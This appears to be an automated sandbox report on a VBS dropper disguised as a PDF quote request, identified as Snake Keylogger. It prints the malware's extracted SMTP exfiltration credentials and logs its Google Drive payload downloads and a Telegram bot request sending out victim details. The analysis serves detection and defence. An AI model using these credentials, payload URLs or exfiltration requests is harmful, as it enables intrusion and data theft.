Windows Analysis Report
RFQ_64182MR_PDF.R00.vbs

AV Detection

Source: 00000008.00000002.2988377794.00000000242C1000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "rajan@recsb.com", "Password": "1=vI*r6^", "Host": "mail.recsb.com", "Port": "587", "Version": "4.4"}

Source: RFQ_64182MR_PDF.R00.vbs	ReversingLabs: Detection: 26%
Source: RFQ_64182MR_PDF.R00.vbs	Virustotal: Detection: 25%			Perma Link

Source: Submited Sample

Integrated Neural Analysis Model: Matched 96.8% probability

Location Tracking

Source: unknown

DNS query: name: reallyfreegeoip.org

Compliance

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49779 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49867 version: TLS 1.2

Source:	Binary string: *.pdbS source: powershell.exe, 00000001.00000002.1956313981.000002681D883000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.Core.pdb source: powershell.exe, 00000006.00000002.2175218431.0000000007450000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ment.Automation.pdb source: powershell.exe, 00000006.00000002.2175218431.0000000007431000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ows\dll\System.Core.pdbsAF source: powershell.exe, 00000001.00000002.1955638921.000002681D7FE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbx source: powershell.exe, 00000001.00000002.1956313981.000002681D883000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2181957745.000000000823C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ystem.pdbnA source: powershell.exe, 00000001.00000002.1955638921.000002681D7FE000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1OucVAKucyFgsylE0-RU3uZkNde2alMJP HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1OucVAKucyFgsylE0-RU3uZkNde2alMJP&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ADate%20and%20Time:%2024/10/2024%20/%2017:25:47%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20648351%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49793 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49768 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49741 -> 216.58.206.78:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49790 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49821 -> 188.114.97.3:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1OucVAKucyFgsylE0-RU3uZkNde2alMJP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1UFq7IEKIZcVBH3MHn7RsN9JKGyqRUmUY HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1UFq7IEKIZcVBH3MHn7RsN9JKGyqRUmUY&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49779 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1OucVAKucyFgsylE0-RU3uZkNde2alMJP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1OucVAKucyFgsylE0-RU3uZkNde2alMJP HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1OucVAKucyFgsylE0-RU3uZkNde2alMJP&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1UFq7IEKIZcVBH3MHn7RsN9JKGyqRUmUY HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1UFq7IEKIZcVBH3MHn7RsN9JKGyqRUmUY&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ADate%20and%20Time:%2024/10/2024%20/%2017:25:47%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20648351%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 24 Oct 2024 06:43:37 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: powershell.exe, 00000001.00000002.1920855418.000002680752C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.000002680718D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000001.00000002.1920855418.00000268075FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268071C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000001.00000002.1951410104.0000026815481000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.1920855418.0000026805637000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1920855418.0000026805411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2153541152.0000000004931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1920855418.0000026805637000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.1920855418.0000026805411000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000006.00000002.2153541152.0000000004931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000001.00000002.1920855418.000002680588E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268071AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268058AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.000002680718D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268071B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268058A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000001.00000002.1951410104.0000026815481000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1951410104.0000026815481000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1951410104.0000026815481000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.1920855418.0000026807188000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.000002680752C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.googP
Source: powershell.exe, 00000001.00000002.1920855418.000002680686E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268058BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.0000026805637000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.000002680752C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000001.00000002.1920855418.0000026805637000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1OucVAKucyFgsylE0-RU3uZkNde2alMJPP
Source: powershell.exe, 00000006.00000002.2153541152.0000000004A87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1OucVAKucyFgsylE0-RU3uZkNde2alMJPXR#l
Source: powershell.exe, 00000001.00000002.1920855418.00000268071B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.googh
Source: powershell.exe, 00000001.00000002.1920855418.00000268058AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268075FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268071B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com
Source: powershell.exe, 00000001.00000002.1920855418.00000268058AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268075FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268059C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268058A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268071B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268071C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268071AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1OucVAKucyFgsylE0-RU3uZkNde2alMJP&export=download
Source: msiexec.exe, 00000008.00000002.2971077056.00000000005AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1UFq7IEKIZcVBH3MHn7RsN9JKGyqRUmUY&export=download
Source: powershell.exe, 00000001.00000002.1920855418.0000026805637000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1920855418.000002680686E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.1951410104.0000026815481000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000001.00000002.1920855418.000002680588E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268071AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268058AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.000002680718D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268071B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268058A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: msiexec.exe, 00000008.00000002.2990381131.00000000253E5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2990381131.000000002553B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2990381131.000000002540C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: msiexec.exe, 00000008.00000002.2990381131.00000000253E5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2990381131.000000002553B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2990381131.000000002540C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: powershell.exe, 00000001.00000002.1920855418.000002680588E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268071AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268058AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.000002680718D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268071B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268058A7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2259034676.00000000005D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000001.00000002.1920855418.000002680588E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268071AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268058AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.000002680718D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268071B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268058A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000001.00000002.1920855418.000002680588E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268071AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268058AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.000002680718D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268071B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268058A7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2259034676.00000000005D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000001.00000002.1920855418.000002680588E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268071AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268058AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.000002680718D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268071B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268058A7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2259034676.00000000005D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867

Source: unknown	HTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49867 version: TLS 1.2

System Summary

Source: amsi64_3300.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi32_5432.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3300, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5432, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Source: C:\Windows\System32\wscript.exe	COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}			Jump to behavior

